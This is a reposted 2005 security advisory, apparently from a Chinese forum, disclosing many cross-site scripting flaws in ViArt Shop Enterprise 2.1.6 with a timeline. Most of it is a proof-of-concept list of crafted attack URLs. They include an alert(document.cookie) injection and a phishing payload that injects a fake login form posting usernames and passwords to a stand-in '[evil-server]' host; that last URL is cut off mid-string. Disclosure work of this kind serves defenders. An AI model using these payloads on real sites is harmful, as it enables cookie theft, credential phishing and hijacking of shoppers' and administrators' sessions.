[转载]ViArt Shop企业版多个跨站脚本漏洞以及测试方法
信息来源:[email]lostmon@gmail.com[/email]ViArt Shop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple variables upon submission to the multiple scripts.
This could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.
##########
versions:
##########
ViArt Shop Enterprise v.2.1.6 afected
also is posible prior versions are afected too.
##########
Solution:
##########
Currently, there are no known upgrades, patches, or workarounds
available to correct this issues.
#########
timeline:
#########
discovered : 25 april 2005
vendor notify :28 april 2005
vendor response :
vendor fix:
disclosure:29 april 2005
########## Proof of concept ##############
############
basket.php
###########
http://[victim]/basket.php?rp=3Dproducts.php%3Fcategory_id%3D0
[XSS-CODE]%26search_string%3Dss%26search_category_id%3D
http://[victim]/basket.php?rp=3Dproducts.php%3Fcategory_id%3D0%26
search_string%3D[XSS-CODE]%26search_string%3Dss%26
search_category_id%3D%26search_category_id%3D
http://[victim]/basket.php?rp=3Dproducts.php%3Fcategory_id
%3D0%26search_string%3Dss%26search_string%3Dss%26
search_category_id[XSS-CODE]%26search_category_id%3D
http://[victim]/basket.php?rp=3Dproducts.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26
search_category_id%3D[XSS-CODE]%26search_category_id%3D
http://[victim]/basket.php?rp=3Dproducts.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26search_category_id%3D
%26search_category_id%3D[XSS-CODE]
###########
forum.php
###########
http://[victim]/forum_new_thread.php
form fields nickname,email,topic and message are vulnerables to XSS
for exploiting email you can use:
[XSS-CODE]@email.com or email@[XSS-CODE].com
http://[victim]/forum_thread.php?thread_id=3D2
wen reply to a post nickname and message fields are vulnerable to XSS
all of this codes are executed wen a user view the forum or wen admin
look in "admin panel" for "forum threads" in forum menu
###########
page.php
###########
http://[victim]/page.php?page=3Dabout%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/page.php?page=3D%3Cp%3Ean%20eror%20was
%20send%20to%20webmaster,%20please%20insert%20your%20
username%20and%20password%20,%20and%20continue%20shopping
%20%3Cform%20action=3D%22http://[evil-server]/save.php%22%20
method=3D%22post%22%3EUsername:%3Cinput%20aame=3D%22username
%22%20type=3D%22text%22%20maxlength=3D%2230%22%3E%3Cbr%3EPassword:
%3Cinput%20name=3D%22password%22%20type=3D%22text%22%20maxlength=3D
%2230%22%3E%3Cbr%3E%3Cinput%20name=3D%
############
reviews.php
############
http://[victim]/reviews.php?category_id=3D0&item_id=3D4[XSS-CODE]
http://[victim]/reviews.php?category_id=3D0[XSS-CODE]&item_id=3D4
http://[victim]/reviews.php?filter=3D0&item_id=3D4
[XSS-CODE]&category_id=3D0
#################
products.php
#################
http://[victim]/product_details.php?item_id=3D4
&category_id=3D0[XSS-CODE]
http://[victim]/products.php?category_id=3D13[XSS-CODE]
http://[victim]/products.php?category_id=3D0&search_string=3D
[XSS-CODE]&search_category_id=3D
##################
news_view.php
##################
http://[victim]/news_view.php?news_id=3D3&rp=3D
news.php[XSS-CODE]&page=3D1
http://[victim]/news_view.php?news_id=3D3&rp=3D
news.php&page=3D1[XSS-CODE]
页:
[1]